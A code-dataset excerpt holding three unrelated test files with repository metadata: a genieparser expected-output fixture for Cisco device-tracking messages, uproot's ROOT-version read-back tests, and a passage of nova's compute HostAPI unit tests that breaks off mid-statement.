0a5005badfb4a907ca77e2f1c5a7394f75d3f15d | 2,645 | py | Python | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowDeviceTrackingMessages/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"entries": {
1: {
"timestamp": "Wed Jul 21 20:31:23.000",
"vlan": 1,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": False,
},
2: {
"timestamp": "Wed Jul 21 20:31:23.000",
"vlan": 1006,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": False,
},
3: {
"timestamp": "Wed Jul 21 20:31:25.000",
"vlan": 1006,
"interface": "Et0/1",
"mac": "aabb.cc00.0300",
"protocol": "ARP::REP",
"ip": "192.168.23.3",
"ignored": True,
},
4: {
"timestamp": "Wed Jul 21 20:31:26.000",
"vlan": 10,
"interface": "Et0/0",
"protocol": "NDP::NS",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
},
5: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::NA",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
"drop_reason": "Packet accepted but not forwarded",
},
6: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"protocol": "NDP::NS",
"ip": "A::1",
"ignored": False,
},
7: {
"timestamp": "Wed Jul 21 20:31:27.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::RA",
"ip": "FE80::A8BB:CCFF:FE00:100",
"ignored": False,
"drop_reason": "Packet not authorized on port",
},
8: {
"timestamp": "Wed Jul 21 20:31:28.000",
"vlan": 10,
"interface": "Et0/0",
"mac": "aabb.cc00.0100",
"protocol": "NDP::NA",
"ip": "A::1",
"ignored": False,
"drop_reason": "Packet accepted but not forwarded"
}
}
} | 34.350649 | 67 | 0.342155 | 239 | 2,645 | 3.769874 | 0.263598 | 0.106548 | 0.133185 | 0.150943 | 0.932297 | 0.914539 | 0.844617 | 0.844617 | 0.810211 | 0.669256 | 0 | 0.164057 | 0.493006 | 2,645 | 77 | 68 | 34.350649 | 0.50783 | 0 | 0 | 0.623377 | 0 | 0 | 0.358277 | 0.027211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a7718b2ef0886feda21fb86a60ae48f98e1e488 | 17,675 | py | Python | tests/test_versions.py | masonproffitt/uproot | 634667fad826ec6c86e2df442887b1024c2cfee8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_versions.py | masonproffitt/uproot | 634667fad826ec6c86e2df442887b1024c2cfee8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_versions.py | masonproffitt/uproot | 634667fad826ec6c86e2df442887b1024c2cfee8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot/blob/master/LICENSE
import pytest
try:
import lzma
except ImportError:
lzma = pytest.importorskip('backports.lzma')
lz4 = pytest.importorskip('lz4')
import uproot
class Test(object):
sample = {
b"n": [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4],
b"b": [True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False, True, False],
b"ab": [[False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True], [False, True, False], [True, False, True]],
b"Ab": [[], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False], [], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False], [], [True], [True, True], [True, True, True], [True, True, True, True], [], [False], [False, False], [False, False, False], [False, False, False, False]],
b"i1": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai1": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai1": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u1": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au1": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au1": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i2": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai2": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai2": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au2": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au2": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i4": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai4": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai4": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u4": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au4": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au4": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"i8": [-15, -14, -13, -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
b"ai8": [[-14, -13, -12], [-13, -12, -11], [-12, -11, -10], [-11, -10, -9], [-10, -9, -8], [-9, -8, -7], [-8, -7, -6], [-7, -6, -5], [-6, -5, -4], [-5, -4, -3], [-4, -3, -2], [-3, -2, -1], [-2, -1, 0], [-1, 0, 1], [0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17]],
b"Ai8": [[], [-15], [-15, -13], [-15, -13, -11], [-15, -13, -11, -9], [], [-10], [-10, -8], [-10, -8, -6], [-10, -8, -6, -4], [], [-5], [-5, -3], [-5, -3, -1], [-5, -3, -1, 1], [], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16]],
b"u8": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
b"au8": [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [11, 12, 13], [12, 13, 14], [13, 14, 15], [14, 15, 16], [15, 16, 17], [16, 17, 18], [17, 18, 19], [18, 19, 20], [19, 20, 21], [20, 21, 22], [21, 22, 23], [22, 23, 24], [23, 24, 25], [24, 25, 26], [25, 26, 27], [26, 27, 28], [27, 28, 29], [28, 29, 30], [29, 30, 31], [30, 31, 32]],
b"Au8": [[], [0], [0, 2], [0, 2, 4], [0, 2, 4, 6], [], [5], [5, 7], [5, 7, 9], [5, 7, 9, 11], [], [10], [10, 12], [10, 12, 14], [10, 12, 14, 16], [], [15], [15, 17], [15, 17, 19], [15, 17, 19, 21], [], [20], [20, 22], [20, 22, 24], [20, 22, 24, 26], [], [25], [25, 27], [25, 27, 29], [25, 27, 29, 31]],
b"f4": [-14.899999618530273, -13.899999618530273, -12.899999618530273, -11.899999618530273, -10.899999618530273, -9.899999618530273, -8.899999618530273, -7.900000095367432, -6.900000095367432, -5.900000095367432, -4.900000095367432, -3.9000000953674316, -2.9000000953674316, -1.899999976158142, -0.8999999761581421, 0.10000000149011612, 1.100000023841858, 2.0999999046325684, 3.0999999046325684, 4.099999904632568, 5.099999904632568, 6.099999904632568, 7.099999904632568, 8.100000381469727, 9.100000381469727, 10.100000381469727, 11.100000381469727, 12.100000381469727, 13.100000381469727, 14.100000381469727],
b"af4": [[-13.899999618530273, -12.899999618530273, -11.899999618530273], [-12.899999618530273, -11.899999618530273, -10.899999618530273], [-11.899999618530273, -10.899999618530273, -9.899999618530273], [-10.899999618530273, -9.899999618530273, -8.899999618530273], [-9.899999618530273, -8.899999618530273, -7.900000095367432], [-8.899999618530273, -7.900000095367432, -6.900000095367432], [-7.900000095367432, -6.900000095367432, -5.900000095367432], [-6.900000095367432, -5.900000095367432, -4.900000095367432], [-5.900000095367432, -4.900000095367432, -3.9000000953674316], [-4.900000095367432, -3.9000000953674316, -2.9000000953674316], [-3.9000000953674316, -2.9000000953674316, -1.899999976158142], [-2.9000000953674316, -1.899999976158142, -0.8999999761581421], [-1.899999976158142, -0.8999999761581421, 0.10000000149011612], [-0.8999999761581421, 0.10000000149011612, 1.100000023841858], [0.10000000149011612, 1.100000023841858, 2.0999999046325684], [1.100000023841858, 2.0999999046325684, 3.0999999046325684], [2.0999999046325684, 3.0999999046325684, 4.099999904632568], [3.0999999046325684, 4.099999904632568, 5.099999904632568], [4.099999904632568, 5.099999904632568, 6.099999904632568], [5.099999904632568, 6.099999904632568, 7.099999904632568], [6.099999904632568, 7.099999904632568, 8.100000381469727], [7.099999904632568, 8.100000381469727, 9.100000381469727], [8.100000381469727, 9.100000381469727, 10.100000381469727], [9.100000381469727, 10.100000381469727, 11.100000381469727], [10.100000381469727, 11.100000381469727, 12.100000381469727], [11.100000381469727, 12.100000381469727, 13.100000381469727], [12.100000381469727, 13.100000381469727, 14.100000381469727], [13.100000381469727, 14.100000381469727, 15.100000381469727], [14.100000381469727, 15.100000381469727, 16.100000381469727], [15.100000381469727, 16.100000381469727, 17.100000381469727]],
b"Af4": [[], [-15.0], [-15.0, -13.899999618530273], [-15.0, -13.899999618530273, -12.800000190734863], [-15.0, -13.899999618530273, -12.800000190734863, -11.699999809265137], [], [-10.0], [-10.0, -8.899999618530273], [-10.0, -8.899999618530273, -7.800000190734863], [-10.0, -8.899999618530273, -7.800000190734863, -6.699999809265137], [], [-5.0], [-5.0, -3.9000000953674316], [-5.0, -3.9000000953674316, -2.799999952316284], [-5.0, -3.9000000953674316, -2.799999952316284, -1.7000000476837158], [], [0.0], [0.0, 1.100000023841858], [0.0, 1.100000023841858, 2.200000047683716], [0.0, 1.100000023841858, 2.200000047683716, 3.299999952316284], [], [5.0], [5.0, 6.099999904632568], [5.0, 6.099999904632568, 7.199999809265137], [5.0, 6.099999904632568, 7.199999809265137, 8.300000190734863], [], [10.0], [10.0, 11.100000381469727], [10.0, 11.100000381469727, 12.199999809265137], [10.0, 11.100000381469727, 12.199999809265137, 13.300000190734863]],
b"f8": [-14.9, -13.9, -12.9, -11.9, -10.9, -9.9, -8.9, -7.9, -6.9, -5.9, -4.9, -3.9000000000000004, -2.9000000000000004, -1.9000000000000004, -0.9000000000000004, 0.09999999999999964, 1.0999999999999996, 2.0999999999999996, 3.0999999999999996, 4.1, 5.1, 6.1, 7.1, 8.1, 9.1, 10.1, 11.1, 12.1, 13.1, 14.1],
b"af8": [[-13.9, -12.9, -11.9], [-12.9, -11.9, -10.9], [-11.9, -10.9, -9.9], [-10.9, -9.9, -8.9], [-9.9, -8.9, -7.9], [-8.9, -7.9, -6.9], [-7.9, -6.9, -5.9], [-6.9, -5.9, -4.9], [-5.9, -4.9, -3.9000000000000004], [-4.9, -3.9000000000000004, -2.9000000000000004], [-3.9000000000000004, -2.9000000000000004, -1.9000000000000004], [-2.9000000000000004, -1.9000000000000004, -0.9000000000000004], [-1.9000000000000004, -0.9000000000000004, 0.09999999999999964], [-0.9000000000000004, 0.09999999999999964, 1.0999999999999996], [0.09999999999999964, 1.0999999999999996, 2.0999999999999996], [1.0999999999999996, 2.0999999999999996, 3.0999999999999996], [2.0999999999999996, 3.0999999999999996, 4.1], [3.0999999999999996, 4.1, 5.1], [4.1, 5.1, 6.1], [5.1, 6.1, 7.1], [6.1, 7.1, 8.1], [7.1, 8.1, 9.1], [8.1, 9.1, 10.1], [9.1, 10.1, 11.1], [10.1, 11.1, 12.1], [11.1, 12.1, 13.1], [12.1, 13.1, 14.1], [13.1, 14.1, 15.1], [14.1, 15.1, 16.1], [15.1, 16.1, 17.1]],
b"Af8": [[], [-15.0], [-15.0, -13.9], [-15.0, -13.9, -12.8], [-15.0, -13.9, -12.8, -11.7], [], [-10.0], [-10.0, -8.9], [-10.0, -8.9, -7.8], [-10.0, -8.9, -7.8, -6.7], [], [-5.0], [-5.0, -3.9], [-5.0, -3.9, -2.8], [-5.0, -3.9, -2.8, -1.7], [], [0.0], [0.0, 1.1], [0.0, 1.1, 2.2], [0.0, 1.1, 2.2, 3.3], [], [5.0], [5.0, 6.1], [5.0, 6.1, 7.2], [5.0, 6.1, 7.2, 8.3], [], [10.0], [10.0, 11.1], [10.0, 11.1, 12.2], [10.0, 11.1, 12.2, 13.3]],
b"str": [b"hey-0", b"hey-1", b"hey-2", b"hey-3", b"hey-4", b"hey-5", b"hey-6", b"hey-7", b"hey-8", b"hey-9", b"hey-10", b"hey-11", b"hey-12", b"hey-13", b"hey-14", b"hey-15", b"hey-16", b"hey-17", b"hey-18", b"hey-19", b"hey-20", b"hey-21", b"hey-22", b"hey-23", b"hey-24", b"hey-25", b"hey-26", b"hey-27", b"hey-28", b"hey-29"]
}
def compare(self, arrays):
assert set(arrays.keys()) == set(self.sample.keys())
for name in arrays.keys():
assert arrays[name].tolist() == self.sample[name]
def test_5_23_02(self):
# 2009-02-26, TTree version 16
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.23.02-{0}.root".format(compression))["sample"].arrays())
def test_5_24_00(self):
# 2009-06-30, TTree version 16
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.24.00-{0}.root".format(compression))["sample"].arrays())
def test_5_25_02(self):
# 2009-10-01, TTree version 17
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.25.02-{0}.root".format(compression))["sample"].arrays())
def test_5_26_00(self):
# 2009-12-14, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.26.00-{0}.root".format(compression))["sample"].arrays())
def test_5_27_02(self):
# 2010-04-27, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.27.02-{0}.root".format(compression))["sample"].arrays())
def test_5_28_00(self):
# 2010-12-15, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.28.00-{0}.root".format(compression))["sample"].arrays())
def test_5_29_02(self):
# 2011-04-21, TTree version 18
for compression in "uncompressed", "zlib":
self.compare(uproot.open("tests/samples/sample-5.29.02-{0}.root".format(compression))["sample"].arrays())
def test_5_30_00(self):
# 2011-06-28, TTree version 19
for compression in "uncompressed", "zlib", "lzma":
self.compare(uproot.open("tests/samples/sample-5.30.00-{0}.root".format(compression))["sample"].arrays())
def test_6_08_04(self):
# 2017-01-13, TTree version 19
for compression in "uncompressed", "zlib", "lzma":
self.compare(uproot.open("tests/samples/sample-6.08.04-{0}.root".format(compression))["sample"].arrays())
def test_6_10_05(self):
# 2017-07-28, TTree version 19
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.10.05-{0}.root".format(compression))["sample"].arrays())
def test_6_14_00(self):
# 2018-06-20, TTree version 20
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.14.00-{0}.root".format(compression))["sample"].arrays())
def test_6_16_00(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.16.00-{0}.root".format(compression))["sample"].arrays())
def test_6_18_00(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.18.00-{0}.root".format(compression))["sample"].arrays())
def test_6_20_04(self):
for compression in "uncompressed", "zlib", "lzma", "lz4":
self.compare(uproot.open("tests/samples/sample-6.20.04-{0}.root".format(compression))["sample"].arrays())
| 129.014599 | 1,877 | 0.527242 | 3,050 | 17,675 | 3.041639 | 0.047213 | 0.060149 | 0.081276 | 0.110596 | 0.88229 | 0.85685 | 0.688477 | 0.522691 | 0.522475 | 0.51342 | 0 | 0.423466 | 0.178331 | 17,675 | 136 | 1,878 | 129.963235 | 0.215314 | 0.023876 | 0 | 0.153846 | 0 | 0 | 0.066415 | 0.030046 | 0 | 0 | 0 | 0 | 0.021978 | 1 | 0.164835 | false | 0 | 0.065934 | 0 | 0.252747 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a87205aeb3d34bd45b62e4b3ca500971354fb51 | 16,212 | py | Python | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
] | 1 | 2021-04-08T10:13:03.000Z | 2021-04-08T10:13:03.000Z | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
] | null | null | null | nova/tests/compute/test_host_api.py | bopopescu/nova-39 | 36c7a819582b838b7bbab11d55ca3d991a587405 | [
"Apache-2.0"
] | 1 | 2020-07-24T09:39:47.000Z | 2020-07-24T09:39:47.000Z | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.cells import utils as cells_utils
from nova import compute
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.openstack.common import rpc
from nova import test
class ComputeHostAPITestCase(test.TestCase):
def setUp(self):
super(ComputeHostAPITestCase, self).setUp()
self.host_api = compute.HostAPI()
self.ctxt = context.get_admin_context()
def _mock_rpc_call(self, expected_message, result=None):
if result is None:
result = 'fake-result'
self.mox.StubOutWithMock(rpc, 'call')
rpc.call(self.ctxt, 'compute.fake_host',
expected_message, None).AndReturn(result)
def _mock_assert_host_exists(self):
"""Sets it so that the host API always thinks that 'fake_host'
exists.
"""
def fake_assert_host_exists(context, host_name):
return 'fake_host'
self.stubs.Set(self.host_api, '_assert_host_exists',
fake_assert_host_exists)
def test_set_host_enabled(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'set_host_enabled',
'namespace': None,
'args': {'enabled': 'fake_enabled'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_enabled(self.ctxt, 'fake_host',
'fake_enabled')
self.assertEqual('fake-result', result)
def test_host_name_from_assert_hosts_exists(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'set_host_enabled',
'namespace': None,
'args': {'enabled': 'fake_enabled'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_enabled(self.ctxt, 'fake_hosT',
'fake_enabled')
self.assertEqual('fake-result', result)
def test_get_host_uptime(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'get_host_uptime',
'namespace': None,
'args': {},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.get_host_uptime(self.ctxt, 'fake_host')
self.assertEqual('fake-result', result)
def test_host_power_action(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'host_power_action',
'namespace': None,
'args': {'action': 'fake_action'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.host_power_action(self.ctxt, 'fake_host',
'fake_action')
self.assertEqual('fake-result', result)
def test_set_host_maintenance(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'host_maintenance_mode',
'namespace': None,
'args': {'host': 'fake_host', 'mode': 'fake_mode'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_maintenance(self.ctxt, 'fake_host',
'fake_mode')
self.assertEqual('fake-result', result)
def test_service_get_all_no_zones(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
self.mox.StubOutWithMock(self.host_api.db,
'service_get_all')
# Test no filters
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt)
self.mox.VerifyAll()
self.assertEqual(services, result)
# Test no filters #2
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, filters={})
self.mox.VerifyAll()
self.assertEqual(services, result)
# Test w/ filter
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=dict(key1='val2'))
self.mox.VerifyAll()
self.assertEqual([services[1]], result)
def test_service_get_all(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
exp_services = []
for service in services:
exp_service = {}
exp_service.update(availability_zone='nova', **service)
exp_services.append(exp_service)
self.mox.StubOutWithMock(self.host_api.db,
'service_get_all')
# Test no filters
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test no filters #2
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, filters={},
set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test w/ filter
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
